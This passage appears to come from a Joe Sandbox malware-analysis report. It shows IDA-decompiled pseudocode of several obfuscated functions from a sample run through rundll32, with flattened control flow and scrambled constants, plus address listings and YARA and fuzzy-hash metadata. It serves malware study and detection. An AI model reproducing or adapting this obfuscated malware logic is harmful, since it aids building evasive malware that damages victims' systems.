									} else {
									}
								} else {
									_t286 =  *0x2d5c9c; // 0x0
									_t222 =  &_v128; // 0xe840e3
									_t288 = E002BAD30( *_t312, _v24, _v28, _v56, _v40,  &_v20,  *((intOrPtr*)(_t312 + 4)), _v104, _v72, _v20,  *_t222, _v80,  *((intOrPtr*)(_t286 + 0x50)), _t293, _t293, _v64, _v112, _v92);
									_t318 = _t318 + 0x40;
									if(_t288 == _v136) {
										 *_t291 = _v24;
										_t310 = 1;
										 *((intOrPtr*)(_t291 + 4)) = _v20;
									} else {
										_t293 = 0x1b7bba2;
										continue;
									}
								}
							}
						}
					}
					return _t310;
				}
				_t293 = 0x8150c28;
				goto L13;
			}





















































                                                                                                                      0x002c45d4
                                                                                                                      0x002c45dd
                                                                                                                      0x002c45e5
                                                                                                                      0x002c45e6
                                                                                                                      0x002c45e7
                                                                                                                      0x002c45e9
                                                                                                                      0x002c45ee
                                                                                                                      0x002c45f9
                                                                                                                      0x002c45fb
                                                                                                                      0x002c4602
                                                                                                                      0x002c4605
                                                                                                                      0x002c460e
                                                                                                                      0x002c4616
                                                                                                                      0x002c461b
                                                                                                                      0x002c4623
                                                                                                                      0x002c462b
                                                                                                                      0x002c4633
                                                                                                                      0x002c463b
                                                                                                                      0x002c4643
                                                                                                                      0x002c464b
                                                                                                                      0x002c4653
                                                                                                                      0x002c465b
                                                                                                                      0x002c4663
                                                                                                                      0x002c466e
                                                                                                                      0x002c4676
                                                                                                                      0x002c4681
                                                                                                                      0x002c4690
                                                                                                                      0x002c4691
                                                                                                                      0x002c469b
                                                                                                                      0x002c469f
                                                                                                                      0x002c46a4
                                                                                                                      0x002c46ac
                                                                                                                      0x002c46b4
                                                                                                                      0x002c46bc
                                                                                                                      0x002c46c4
                                                                                                                      0x002c46cc
                                                                                                                      0x002c46d4
                                                                                                                      0x002c46d9
                                                                                                                      0x002c46de
                                                                                                                      0x002c46e6
                                                                                                                      0x002c46ee
                                                                                                                      0x002c46f6
                                                                                                                      0x002c46fe
                                                                                                                      0x002c4706
                                                                                                                      0x002c470e
                                                                                                                      0x002c4716
                                                                                                                      0x002c4723
                                                                                                                      0x002c4727
                                                                                                                      0x002c472f
                                                                                                                      0x002c4737
                                                                                                                      0x002c473f
                                                                                                                      0x002c4744
                                                                                                                      0x002c4749
                                                                                                                      0x002c474e
                                                                                                                      0x002c4756
                                                                                                                      0x002c475e
                                                                                                                      0x002c4766
                                                                                                                      0x002c476e
                                                                                                                      0x002c4776
                                                                                                                      0x002c477e
                                                                                                                      0x002c4786
                                                                                                                      0x002c478e
                                                                                                                      0x002c4796
                                                                                                                      0x002c479e
                                                                                                                      0x002c47ab
                                                                                                                      0x002c47af
                                                                                                                      0x002c47b7
                                                                                                                      0x002c47bf
                                                                                                                      0x002c47cc
                                                                                                                      0x002c47d2
                                                                                                                      0x002c47da
                                                                                                                      0x002c47e2
                                                                                                                      0x002c47e7
                                                                                                                      0x002c47ec
                                                                                                                      0x002c47f4
                                                                                                                      0x002c4803
                                                                                                                      0x002c4806
                                                                                                                      0x002c480a
                                                                                                                      0x002c480f
                                                                                                                      0x002c4817
                                                                                                                      0x002c481f
                                                                                                                      0x002c4827
                                                                                                                      0x002c482c
                                                                                                                      0x002c4834
                                                                                                                      0x002c4844
                                                                                                                      0x002c4848
                                                                                                                      0x002c4850
                                                                                                                      0x002c485b
                                                                                                                      0x002c4866
                                                                                                                      0x002c4871
                                                                                                                      0x002c487e
                                                                                                                      0x002c487f
                                                                                                                      0x002c4883
                                                                                                                      0x002c488b
                                                                                                                      0x002c4898
                                                                                                                      0x002c489c
                                                                                                                      0x002c48a4
                                                                                                                      0x002c48b7
                                                                                                                      0x002c48bb
                                                                                                                      0x002c48c3
                                                                                                                      0x002c48cb
                                                                                                                      0x002c48d3
                                                                                                                      0x002c48db
                                                                                                                      0x002c48e8
                                                                                                                      0x002c48f0
                                                                                                                      0x002c48fd
                                                                                                                      0x002c4901
                                                                                                                      0x002c4909
                                                                                                                      0x002c4911
                                                                                                                      0x002c4919
                                                                                                                      0x002c4921
                                                                                                                      0x002c4929
                                                                                                                      0x002c4931
                                                                                                                      0x002c4936
                                                                                                                      0x002c493e
                                                                                                                      0x002c4946
                                                                                                                      0x002c4951
                                                                                                                      0x002c495c
                                                                                                                      0x002c4967
                                                                                                                      0x002c496f
                                                                                                                      0x002c4977
                                                                                                                      0x002c497f
                                                                                                                      0x002c4987
                                                                                                                      0x002c498f
                                                                                                                      0x002c4997
                                                                                                                      0x002c499f
                                                                                                                      0x002c49a7
                                                                                                                      0x002c49af
                                                                                                                      0x002c49b7
                                                                                                                      0x002c49c5
                                                                                                                      0x002c4ad4
                                                                                                                      0x002c4ad5
                                                                                                                      0x002c4add
                                                                                                                      0x002c4ae2
                                                                                                                      0x002c4aed
                                                                                                                      0x002c4aef
                                                                                                                      0x00000000
                                                                                                                      0x002c4aef
                                                                                                                      0x002c49cb
                                                                                                                      0x002c49d1
                                                                                                                      0x002c4b41
                                                                                                                      0x002c49d7
                                                                                                                      0x002c49dd
                                                                                                                      0x002c4a72
                                                                                                                      0x002c4aaf
                                                                                                                      0x002c4ab4
                                                                                                                      0x002c4abb
                                                                                                                      0x002c4ac1
                                                                                                                      0x00000000
                                                                                                                      0x002c4ac1
                                                                                                                      0x002c49e3
                                                                                                                      0x002c49e9
                                                                                                                      0x002c4afe
                                                                                                                      0x002c4b04
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c4b0a
                                                                                                                      0x002c49ef
                                                                                                                      0x002c49fb
                                                                                                                      0x002c4a10
                                                                                                                      0x002c4a48
                                                                                                                      0x002c4a4d
                                                                                                                      0x002c4a54
                                                                                                                      0x002c4b15
                                                                                                                      0x002c4b17
                                                                                                                      0x002c4b1f
                                                                                                                      0x002c4a5a
                                                                                                                      0x002c4a5a
                                                                                                                      0x00000000
                                                                                                                      0x002c4a5a
                                                                                                                      0x002c4a54
                                                                                                                      0x002c49e9
                                                                                                                      0x002c49dd
                                                                                                                      0x002c49d1
                                                                                                                      0x002c4b55
                                                                                                                      0x002c4b55
                                                                                                                      0x002c4af9
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GWx$xO?$@
                                                                                                                      • API String ID: 0-2177883290
                                                                                                                      • Opcode ID: 3f2437a3d6c5d0c1d2b81094e8fe74c758a5817011b1fc7b5ee23f4776a92d1d
                                                                                                                      • Instruction ID: 7102d67a10afcebcfbdbd18b8be4b16f64350dc94e49cddc11f650d009033285
                                                                                                                      • Opcode Fuzzy Hash: 3f2437a3d6c5d0c1d2b81094e8fe74c758a5817011b1fc7b5ee23f4776a92d1d
                                                                                                                      • Instruction Fuzzy Hash: 38D10DB24183819FD764CF65C989A5BBBF1BBD4748F508A1DF2D986260D7B19908CF02
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002BE243 Relevance: 4.0, Strings: 3, Instructions: 256COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E002BE243() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr _t246;
				signed int _t250;
				intOrPtr _t256;
				intOrPtr _t261;
				intOrPtr _t262;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				intOrPtr _t277;
				void* _t300;
				char _t304;
				void* _t305;
				void* _t307;

				_v20 = 0x755bf0;
				_v16 = 0xbb5ee2;
				_v12 = 0xb403bb;
				_t262 = 0;
				_v8 = 0;
				_v108 = 0x84f903;
				_v108 = _v108 << 0xe;
				_v108 = _v108 | 0x00052a35;
				_v108 = _v108 + 0x3d3f;
				_v108 = _v108 ^ 0x3e47d87c;
				_v88 = 0x71c3c4;
				_v88 = _v88 + 0xffffe131;
				_t264 = 0x3b;
				_v88 = _v88 / _t264;
				_v88 = _v88 ^ 0x40aa9d70;
				_t300 = 0xfb124ba;
				_v88 = _v88 ^ 0x40a0f61c;
				_v52 = 0x7362f6;
				_v52 = _v52 | 0xb899219a;
				_v52 = _v52 ^ 0xb8f51d59;
				_v56 = 0xfd4e8c;
				_t265 = 0x71;
				_v56 = _v56 * 0x54;
				_v56 = _v56 ^ 0x53104169;
				_v92 = 0xd5c279;
				_v92 = _v92 + 0x8479;
				_v92 = _v92 + 0xffffbe38;
				_v92 = _v92 / _t265;
				_v92 = _v92 ^ 0x0004c231;
				_v68 = 0x9eb1ac;
				_t266 = 0x4a;
				_v68 = _v68 * 0x7b;
				_v68 = _v68 << 5;
				_v68 = _v68 ^ 0x87ec7921;
				_v104 = 0x24a1b7;
				_v104 = _v104 << 4;
				_v104 = _v104 | 0x0d0d6548;
				_t62 =  &_v104; // 0xd0d6548
				_v104 =  *_t62 / _t266;
				_v104 = _v104 ^ 0x003eb00a;
				_v96 = 0x109237;
				_v96 = _v96 ^ 0x088082ff;
				_v96 = _v96 >> 1;
				_v96 = _v96 ^ 0xdcc593d2;
				_v96 = _v96 ^ 0xd88ac121;
				_v100 = 0xaca53b;
				_v100 = _v100 >> 0xc;
				_t267 = 0x53;
				_v100 = _v100 * 0x47;
				_v100 = _v100 + 0xffff22d9;
				_v100 = _v100 ^ 0x0009f7ae;
				_v60 = 0xde163e;
				_v60 = _v60 + 0xffffe594;
				_v60 = _v60 ^ 0x00de9d26;
				_v120 = 0x240793;
				_v120 = _v120 / _t267;
				_v120 = _v120 * 0x19;
				_v120 = _v120 + 0xd430;
				_v120 = _v120 ^ 0x0006e0c9;
				_v124 = 0xc58e86;
				_t268 = 0x65;
				_v124 = _v124 / _t268;
				_v124 = _v124 >> 0xb;
				_v124 = _v124 ^ 0x9d14b09a;
				_v124 = _v124 ^ 0x9d1ca329;
				_v64 = 0xc78ca0;
				_v64 = _v64 | 0xd15d632f;
				_v64 = _v64 ^ 0xd1d5a42f;
				_v128 = 0x79ba0a;
				_v128 = _v128 ^ 0x7ce03b8e;
				_v128 = _v128 + 0x4723;
				_v128 = _v128 >> 0xa;
				_v128 = _v128 ^ 0x00126e73;
				_v112 = 0x301104;
				_v112 = _v112 ^ 0x99cc29f1;
				_v112 = _v112 >> 0xb;
				_v112 = _v112 << 0xe;
				_v112 = _v112 ^ 0xcfe465e8;
				_v72 = 0xf18177;
				_v72 = _v72 + 0xffff968e;
				_v72 = _v72 + 0x6cf6;
				_v72 = _v72 ^ 0x00fdce33;
				_v76 = 0xd90ee1;
				_v76 = _v76 + 0xffffa364;
				_v76 = _v76 ^ 0x3c048803;
				_v76 = _v76 ^ 0x3cd13d13;
				_v116 = 0xc42f7d;
				_v116 = _v116 >> 2;
				_v116 = _v116 + 0x3407;
				_v116 = _v116 >> 7;
				_v116 = _v116 ^ 0x0009b6df;
				_v48 = 0xe39a19;
				_v48 = _v48 | 0x7412591d;
				_v48 = _v48 ^ 0x74ffcd98;
				_v80 = 0xc90483;
				_v80 = _v80 >> 1;
				_t269 = 0x17;
				_v80 = _v80 / _t269;
				_v80 = _v80 * 0x7d;
				_v80 = _v80 ^ 0x0220ab71;
				_v84 = 0xc67ab0;
				_v84 = _v84 >> 0xa;
				_v84 = _v84 * 3;
				_v84 = _v84 | 0xfb397840;
				_v84 = _v84 ^ 0xfb3c3624;
				_t304 = _v44;
				_t299 = _v44;
				goto L1;
				do {
					while(1) {
						L1:
						_t307 = _t300 - 0x73106c8;
						if(_t307 > 0) {
							break;
						}
						if(_t307 == 0) {
							_t250 = E002C026B(_v96,  &_v40,  &_v32, _v100, _v60);
							_t305 = _t305 + 0xc;
							asm("sbb esi, esi");
							_t300 = ( ~_t250 & 0x022a085a) + 0x44dd11e;
							continue;
						}
						if(_t300 == 0xc1fb10) {
							_t300 = 0xde7de8b;
							if(_v44 > 2) {
								_t261 = E002C561F(_v68, _v104,  *((intOrPtr*)(_t299 + 8)),  &_v36);
								_v40 = _t261;
								if(_t261 != 0) {
									_t300 = 0x73106c8;
								}
							}
							continue;
						}
						if(_t300 == 0x37ef4f2) {
							_t304 = E002CE35A();
							_t300 = 0xc8dd531;
							continue;
						}
						if(_t300 == 0x44dd11e) {
							E002B68DE(_v112, _v72, _v76, _v116, _v40);
							_t305 = _t305 + 0xc;
							_t300 = 0xde7de8b;
							continue;
						}
						if(_t300 != 0x677d978) {
							goto L21;
						} else {
							_t256 =  *0x2d520c; // 0x0
							E002BF4BD(_v120, _v124, _t256 + 0x220, _v64, _v28, _v24 + 1, _v128);
							_t277 =  *0x2d520c; // 0x0
							_t305 = _t305 + 0x14;
							_t262 = 1;
							_t300 = 0x44dd11e;
							 *((intOrPtr*)(_t277 + 0x210)) = _v32;
							continue;
						}
					}
					if(_t300 == 0xc8dd531) {
						_t246 = E002BBC8A(_v88, _v52,  &_v44, _t304, _v56, _v92);
						_t299 = _t246;
						_t305 = _t305 + 0x10;
						if(_t246 == 0) {
							_t300 = 0xa73b483;
							goto L21;
						}
						_t300 = 0xc1fb10;
						goto L1;
					}
					if(_t300 == 0xde7de8b) {
						E002BFFF2(_v48, _v80, _v84, _t299);
						L24:
						return _t262;
					}
					if(_t300 != 0xfb124ba) {
						goto L21;
					}
					_t300 = 0x37ef4f2;
					goto L1;
					L21:
				} while (_t300 != 0xa73b483);
				goto L24;
			}


















































                                                                                                                      0x002be249
                                                                                                                      0x002be253
                                                                                                                      0x002be25b
                                                                                                                      0x002be265
                                                                                                                      0x002be267
                                                                                                                      0x002be26e
                                                                                                                      0x002be276
                                                                                                                      0x002be27b
                                                                                                                      0x002be283
                                                                                                                      0x002be28b
                                                                                                                      0x002be293
                                                                                                                      0x002be29b
                                                                                                                      0x002be2ab
                                                                                                                      0x002be2b0
                                                                                                                      0x002be2b6
                                                                                                                      0x002be2be
                                                                                                                      0x002be2c3
                                                                                                                      0x002be2cb
                                                                                                                      0x002be2d3
                                                                                                                      0x002be2db
                                                                                                                      0x002be2e3
                                                                                                                      0x002be2f0
                                                                                                                      0x002be2f3
                                                                                                                      0x002be2f7
                                                                                                                      0x002be2ff
                                                                                                                      0x002be307
                                                                                                                      0x002be30f
                                                                                                                      0x002be31f
                                                                                                                      0x002be323
                                                                                                                      0x002be32b
                                                                                                                      0x002be338
                                                                                                                      0x002be33b
                                                                                                                      0x002be33f
                                                                                                                      0x002be344
                                                                                                                      0x002be34c
                                                                                                                      0x002be354
                                                                                                                      0x002be359
                                                                                                                      0x002be361
                                                                                                                      0x002be369
                                                                                                                      0x002be36d
                                                                                                                      0x002be375
                                                                                                                      0x002be37d
                                                                                                                      0x002be385
                                                                                                                      0x002be389
                                                                                                                      0x002be391
                                                                                                                      0x002be399
                                                                                                                      0x002be3a1
                                                                                                                      0x002be3ab
                                                                                                                      0x002be3ac
                                                                                                                      0x002be3b0
                                                                                                                      0x002be3b8
                                                                                                                      0x002be3c0
                                                                                                                      0x002be3c8
                                                                                                                      0x002be3d0
                                                                                                                      0x002be3d8
                                                                                                                      0x002be3e6
                                                                                                                      0x002be3ef
                                                                                                                      0x002be3f3
                                                                                                                      0x002be3fb
                                                                                                                      0x002be405
                                                                                                                      0x002be413
                                                                                                                      0x002be418
                                                                                                                      0x002be41e
                                                                                                                      0x002be423
                                                                                                                      0x002be42b
                                                                                                                      0x002be433
                                                                                                                      0x002be43b
                                                                                                                      0x002be443
                                                                                                                      0x002be44b
                                                                                                                      0x002be453
                                                                                                                      0x002be45b
                                                                                                                      0x002be463
                                                                                                                      0x002be468
                                                                                                                      0x002be470
                                                                                                                      0x002be478
                                                                                                                      0x002be480
                                                                                                                      0x002be485
                                                                                                                      0x002be48a
                                                                                                                      0x002be492
                                                                                                                      0x002be49a
                                                                                                                      0x002be4a2
                                                                                                                      0x002be4aa
                                                                                                                      0x002be4b2
                                                                                                                      0x002be4ba
                                                                                                                      0x002be4c2
                                                                                                                      0x002be4ca
                                                                                                                      0x002be4d2
                                                                                                                      0x002be4da
                                                                                                                      0x002be4df
                                                                                                                      0x002be4e7
                                                                                                                      0x002be4ec
                                                                                                                      0x002be4f4
                                                                                                                      0x002be4fc
                                                                                                                      0x002be504
                                                                                                                      0x002be50c
                                                                                                                      0x002be514
                                                                                                                      0x002be51c
                                                                                                                      0x002be51f
                                                                                                                      0x002be528
                                                                                                                      0x002be52c
                                                                                                                      0x002be534
                                                                                                                      0x002be53c
                                                                                                                      0x002be546
                                                                                                                      0x002be54a
                                                                                                                      0x002be552
                                                                                                                      0x002be55a
                                                                                                                      0x002be55e
                                                                                                                      0x002be55e
                                                                                                                      0x002be562
                                                                                                                      0x002be562
                                                                                                                      0x002be562
                                                                                                                      0x002be562
                                                                                                                      0x002be568
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002be56e
                                                                                                                      0x002be680
                                                                                                                      0x002be685
                                                                                                                      0x002be68c
                                                                                                                      0x002be694
                                                                                                                      0x00000000
                                                                                                                      0x002be694
                                                                                                                      0x002be57a
                                                                                                                      0x002be633
                                                                                                                      0x002be638
                                                                                                                      0x002be64e
                                                                                                                      0x002be653
                                                                                                                      0x002be65b
                                                                                                                      0x002be661
                                                                                                                      0x002be661
                                                                                                                      0x002be65b
                                                                                                                      0x00000000
                                                                                                                      0x002be638
                                                                                                                      0x002be586
                                                                                                                      0x002be622
                                                                                                                      0x002be624
                                                                                                                      0x00000000
                                                                                                                      0x002be624
                                                                                                                      0x002be592
                                                                                                                      0x002be607
                                                                                                                      0x002be60c
                                                                                                                      0x002be60f
                                                                                                                      0x00000000
                                                                                                                      0x002be60f
                                                                                                                      0x002be59a
                                                                                                                      0x00000000
                                                                                                                      0x002be5a0
                                                                                                                      0x002be5b8
                                                                                                                      0x002be5cb
                                                                                                                      0x002be5d0
                                                                                                                      0x002be5df
                                                                                                                      0x002be5e2
                                                                                                                      0x002be5e3
                                                                                                                      0x002be5e8
                                                                                                                      0x00000000
                                                                                                                      0x002be5e8
                                                                                                                      0x002be59a
                                                                                                                      0x002be6a5
                                                                                                                      0x002be6d7
                                                                                                                      0x002be6dc
                                                                                                                      0x002be6de
                                                                                                                      0x002be6e3
                                                                                                                      0x002be6ef
                                                                                                                      0x00000000
                                                                                                                      0x002be6ef
                                                                                                                      0x002be6e5
                                                                                                                      0x00000000
                                                                                                                      0x002be6e5
                                                                                                                      0x002be6ad
                                                                                                                      0x002be70f
                                                                                                                      0x002be719
                                                                                                                      0x002be722
                                                                                                                      0x002be722
                                                                                                                      0x002be6b5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002be6b7
                                                                                                                      0x00000000
                                                                                                                      0x002be6f4
                                                                                                                      0x002be6f4
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #G$?=$He
                                                                                                                      • API String ID: 0-2298667298
                                                                                                                      • Opcode ID: ef7affb56cd6928006716878bc3ab04bd882b114627b2970bafb45466a1ed62f
                                                                                                                      • Instruction ID: 2c20ec20db85d09b3e4059e2502aad8a3a7a18b57d186902ff259f542b460f2c
                                                                                                                      • Opcode Fuzzy Hash: ef7affb56cd6928006716878bc3ab04bd882b114627b2970bafb45466a1ed62f
                                                                                                                      • Instruction Fuzzy Hash: A7C162B28183409FC768CF65C48A48BFBE1FBC4398F51892DF59686260D7B1D959CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B911A Relevance: 4.0, Strings: 3, Instructions: 254COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E002B911A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v52;
				void* _v64;
				intOrPtr _v68;
				intOrPtr _v92;
				intOrPtr _v100;
				char _v112;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v156;
				char _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				void* _t162;
				signed int _t176;
				signed int _t184;
				void* _t198;
				void* _t200;
				void* _t202;
				intOrPtr _t207;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				void* _t235;
				void* _t236;
				void* _t238;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002BCF25(_t162);
				_v68 = 0x6e7241;
				_t236 = _t235 + 0x10;
				asm("stosd");
				_t198 = 0;
				_t200 = 0x513154f;
				asm("stosd");
				_t231 = 0x5b;
				asm("stosd");
				_v208 = 0x6dc976;
				_v208 = _v208 + 0xffff97e7;
				_v208 = _v208 << 0xf;
				_v208 = _v208 + 0xffff3ee4;
				_v208 = _v208 ^ 0xb0a037f9;
				_v216 = 0xefa27a;
				_v216 = _v216 * 0x2d;
				_v216 = _v216 << 0xe;
				_v216 = _v216 + 0x5c30;
				_v216 = _v216 ^ 0xe3d2b40e;
				_v192 = 0xd4fef0;
				_v192 = _v192 / _t231;
				_v192 = _v192 << 9;
				_v192 = _v192 ^ 0x04a09c26;
				_v172 = 0xfabcfe;
				_v172 = _v172 + 0xadb7;
				_v172 = _v172 ^ 0x00f6fe01;
				_v224 = 0xb5a285;
				_t232 = 0x43;
				_v224 = _v224 * 0x7a;
				_v224 = _v224 >> 1;
				_v224 = _v224 | 0x4641179d;
				_v224 = _v224 ^ 0x6f41a140;
				_v212 = 0x80e1bd;
				_v212 = _v212 / _t232;
				_v212 = _v212 << 9;
				_v212 = _v212 >> 0xc;
				_v212 = _v212 ^ 0x0005f6ff;
				_v220 = 0x3f6ee7;
				_v220 = _v220 >> 5;
				_v220 = _v220 << 0xf;
				_v220 = _v220 | 0x5ccf7ed2;
				_v220 = _v220 ^ 0xfdf08ccb;
				_v188 = 0x96b178;
				_v188 = _v188 * 0x33;
				_v188 = _v188 << 7;
				_v188 = _v188 ^ 0x02ac94c8;
				_v196 = 0x862d42;
				_v196 = _v196 | 0x17619c21;
				_v196 = _v196 ^ 0x73c665d7;
				_v196 = _v196 ^ 0x642dc428;
				_v176 = 0xd9c085;
				_v176 = _v176 | 0xddbc98a5;
				_v176 = _v176 ^ 0xddfc0835;
				_v180 = 0xc6bbdd;
				_v180 = _v180 * 0x34;
				_v180 = _v180 ^ 0x2850aa5e;
				_v168 = 0x548f7e;
				_v168 = _v168 << 2;
				_v168 = _v168 ^ 0x015ffca1;
				_v204 = 0x6ca805;
				_v204 = _v204 + 0x3ad1;
				_v204 = _v204 * 0x44;
				_v204 = _v204 ^ 0x1ce18dde;
				_v184 = 0x9ecbae;
				_v184 = _v184 << 5;
				_v184 = _v184 ^ 0x13d028d8;
				_t233 = _v184;
				_v200 = 0xbd8de1;
				_v200 = _v200 + 0xffffb408;
				_v200 = _v200 | 0x119192b9;
				_v200 = _v200 ^ 0x11b45be6;
				while(1) {
					_t238 = _t200 - 0x8a8a415;
					if(_t238 <= 0) {
					}
					L2:
					if(_t238 == 0) {
						_t176 = E002BCA43( &_v164, _v196, _v176, _v180,  &_v156, _v168);
						_t236 = _t236 + 0x10;
						asm("sbb ecx, ecx");
						_t200 = ( ~_t176 & 0x03566572) + 0x6fcaad9;
						continue;
						do {
							while(1) {
								_t238 = _t200 - 0x8a8a415;
								if(_t238 <= 0) {
								}
								goto L2;
							}
							L45:
							__eflags = _t200 - 0x409adf;
						} while (__eflags != 0);
						L46:
						return _t198;
					}
					if(_t200 == 0x1cefc96) {
						__eflags = _v148 - 1;
						if(__eflags == 0) {
							E002B472E( &_v112);
							L16:
							_t200 = 0xdce0ab1;
							while(1) {
								_t238 = _t200 - 0x8a8a415;
								if(_t238 <= 0) {
								}
								goto L2;
							}
						}
						_t200 = 0x6447723;
						while(1) {
							_t238 = _t200 - 0x8a8a415;
							if(_t238 <= 0) {
							}
							goto L25;
						}
						goto L2;
					}
					if(_t200 == 0x26bd5bb) {
						__eflags = _v148 - 6;
						if(__eflags == 0) {
							E002CA429( &_v112);
							goto L16;
						}
						_t200 = 0xcc2cd30;
						continue;
					}
					if(_t200 == 0x513154f) {
						E002C64C5(_v208, _v216, _v192, _v172, _a4,  &_v52);
						_t236 = _t236 + 0x10;
						_t200 = 0x7b50d2c;
						continue;
					}
					if(_t200 == 0x6447723) {
						__eflags = _v148 - 2;
						if(__eflags == 0) {
							E002C5040( &_v112, _t233);
							goto L16;
						}
						_t200 = 0x92d00b6;
						continue;
					}
					if(_t200 == 0x6fcaad9) {
						_t184 = E002CB9B1(_v224, _v212, __eflags,  &_v164, _v220,  &_v52, _v188);
						_t236 = _t236 + 0x10;
						__eflags = _t184;
						if(__eflags == 0) {
							goto L46;
						}
						L12:
						_t200 = 0x8a8a415;
						continue;
					}
					if(_t200 != 0x7b50d2c) {
						goto L45;
					}
					E002B6A1F(0);
					L10:
					_t200 = 0x6fcaad9;
					continue;
					L25:
					__eflags = _t200 - 0x92d00b6;
					if(_t200 == 0x92d00b6) {
						__eflags = _v148 - 3;
						if(__eflags == 0) {
							E002B88F4( &_v112);
							_t200 = 0xdce0ab1;
							goto L45;
						}
						_t200 = 0xe60179d;
						continue;
					}
					__eflags = _t200 - 0xa53104b;
					if(_t200 == 0xa53104b) {
						_push(_t200);
						_push(_t200);
						_t202 = 0x44;
						_t233 = E002C3512(_t202);
						__eflags = _t233;
						if(__eflags == 0) {
							goto L12;
						}
						_t200 = 0x1cefc96;
						 *((intOrPtr*)(_t233 + 0x20)) = _v100;
						 *((intOrPtr*)(_t233 + 0x40)) = _v144;
						 *((intOrPtr*)(_t233 + 0x34)) = _v92;
						continue;
					}
					__eflags = _t200 - 0xc419b15;
					if(_t200 == 0xc419b15) {
						__eflags = _v148 - 5;
						if(__eflags == 0) {
							E002C0946( &_v112, _t233);
							goto L16;
						}
						_t200 = 0x26bd5bb;
						continue;
					}
					__eflags = _t200 - 0xcc2cd30;
					if(_t200 == 0xcc2cd30) {
						__eflags = _v148 - 7;
						if(__eflags == 0) {
							E002B7B82( &_v112);
						}
						goto L16;
					}
					__eflags = _t200 - 0xdce0ab1;
					if(__eflags == 0) {
						_t207 =  *0x2d5c94; // 0x0
						_t198 = _t198 + 1;
						 *_t233 =  *(_t207 + 0x230);
						 *(_t207 + 0x230) = _t233;
						goto L10;
					}
					__eflags = _t200 - 0xe60179d;
					if(_t200 != 0xe60179d) {
						goto L45;
					}
					__eflags = _v148 - 4;
					if(__eflags == 0) {
						E002B2FA1( &_v112);
						goto L16;
					}
					_t200 = 0xc419b15;
				}
			}









































                                                                                                                      0x002b9124
                                                                                                                      0x002b912b
                                                                                                                      0x002b9132
                                                                                                                      0x002b9133
                                                                                                                      0x002b9134
                                                                                                                      0x002b9139
                                                                                                                      0x002b914d
                                                                                                                      0x002b9150
                                                                                                                      0x002b9153
                                                                                                                      0x002b9155
                                                                                                                      0x002b915c
                                                                                                                      0x002b915d
                                                                                                                      0x002b9160
                                                                                                                      0x002b9161
                                                                                                                      0x002b9169
                                                                                                                      0x002b9171
                                                                                                                      0x002b9176
                                                                                                                      0x002b917e
                                                                                                                      0x002b9186
                                                                                                                      0x002b9193
                                                                                                                      0x002b9197
                                                                                                                      0x002b919c
                                                                                                                      0x002b91a4
                                                                                                                      0x002b91ac
                                                                                                                      0x002b91bc
                                                                                                                      0x002b91c0
                                                                                                                      0x002b91c5
                                                                                                                      0x002b91cd
                                                                                                                      0x002b91d5
                                                                                                                      0x002b91dd
                                                                                                                      0x002b91e5
                                                                                                                      0x002b91f2
                                                                                                                      0x002b91f3
                                                                                                                      0x002b91f7
                                                                                                                      0x002b91fb
                                                                                                                      0x002b9203
                                                                                                                      0x002b920b
                                                                                                                      0x002b9219
                                                                                                                      0x002b921d
                                                                                                                      0x002b9222
                                                                                                                      0x002b9227
                                                                                                                      0x002b922f
                                                                                                                      0x002b9237
                                                                                                                      0x002b923c
                                                                                                                      0x002b9241
                                                                                                                      0x002b9249
                                                                                                                      0x002b9251
                                                                                                                      0x002b925e
                                                                                                                      0x002b9262
                                                                                                                      0x002b9267
